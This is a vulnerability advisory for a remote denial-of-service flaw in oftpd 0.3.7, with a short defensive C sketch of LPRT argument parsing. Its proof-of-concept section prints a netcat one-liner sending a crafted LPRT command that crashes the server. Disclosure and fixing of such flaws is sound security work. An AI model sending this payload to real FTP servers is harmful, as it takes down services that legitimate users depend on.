Oftpd Unsupported Address Family Remote Denial of Service Vulnerability
BID:22073
Info
| Bugtraq ID: | 22073 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | CVE-2006-6767 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 15 2007 12:00AM |
| Updated: | Jan 16 2007 10:00PM |
| Credit: | This issue was disclosed in the referenced Gentoo advisory. |
| Vulnerable: | oftpd oftpd 0.3.7 |
| Not Vulnerable: | |
Discussion
Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input.
Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users.
Oftpd Server 0.3.7 is reported vulnerable; other versions may also be affected.
Exploit / POC
An attacker may exploit this issue through an FTP client.
The following exploit is available:
nc www.example.com 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"
220 Service ready for new user.
521 Only IPv4 supported, address family (4)
Solution / Fix
Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Please see the referenced advisories.
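The following is an added example, not oftpd's code and not a vendor fix: a C sketch of LPRT argument parsing (format af,hal,h1..hn,pal,p1..pn per RFC 1639) that answers a well-formed but non-IPv4 request with a 521 reply and malformed input with 501, without aborting. The names parse_lprt, lprt_target and next_octet are hypothetical.

```c
#include <stdlib.h>
#include <string.h>

/* FTP reply codes returned by this sketch (names are hypothetical). */
enum { LPRT_OK = 200, LPRT_SYNTAX = 501, LPRT_UNSUPPORTED_AF = 521 };
struct lprt_target { unsigned char addr[4]; unsigned short port; };

/* Read one decimal field in 0..255, advance *p past it; -1 on error. */
static int next_octet(const char **p)
{
    char *end;
    long v;
    if (**p < '0' || **p > '9') return -1;  /* sign, space, empty field */
    v = strtol(*p, &end, 10);
    if (v > 255 || end - *p > 3) return -1;
    *p = end;
    return (int)v;
}

/* Parse "af,hal,h1..hn,pal,p1..pn". Every malformed or unsupported input
 * maps to a reply code; nothing aborts and *out is written only on 200. */
int parse_lprt(const char *arg, struct lprt_target *out)
{
    unsigned char f[64];
    size_t n = 0, hal, pal;
    const char *p = arg;

    for (;;) {                              /* bounded tokenizer */
        int v = next_octet(&p);
        if (v < 0 || n == sizeof f) return LPRT_SYNTAX;
        f[n++] = (unsigned char)v;
        if (*p == '\0') break;
        if (*p++ != ',') return LPRT_SYNTAX;
    }
    if (n < 2) return LPRT_SYNTAX;
    hal = f[1];
    if (2 + hal + 1 > n) return LPRT_SYNTAX;        /* address overruns input */
    pal = f[2 + hal];
    if (2 + hal + 1 + pal != n) return LPRT_SYNTAX; /* lengths must add up */
    if (f[0] != 4) return LPRT_UNSUPPORTED_AF;      /* well-formed, not IPv4 */
    if (hal != 4 || pal != 2) return LPRT_SYNTAX;
    memcpy(out->addr, &f[2], 4);
    out->port = (unsigned short)((f[7] << 8) | f[8]);
    return LPRT_OK;
}
```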
References
References:
- Oftpd Homepage (Oftpd)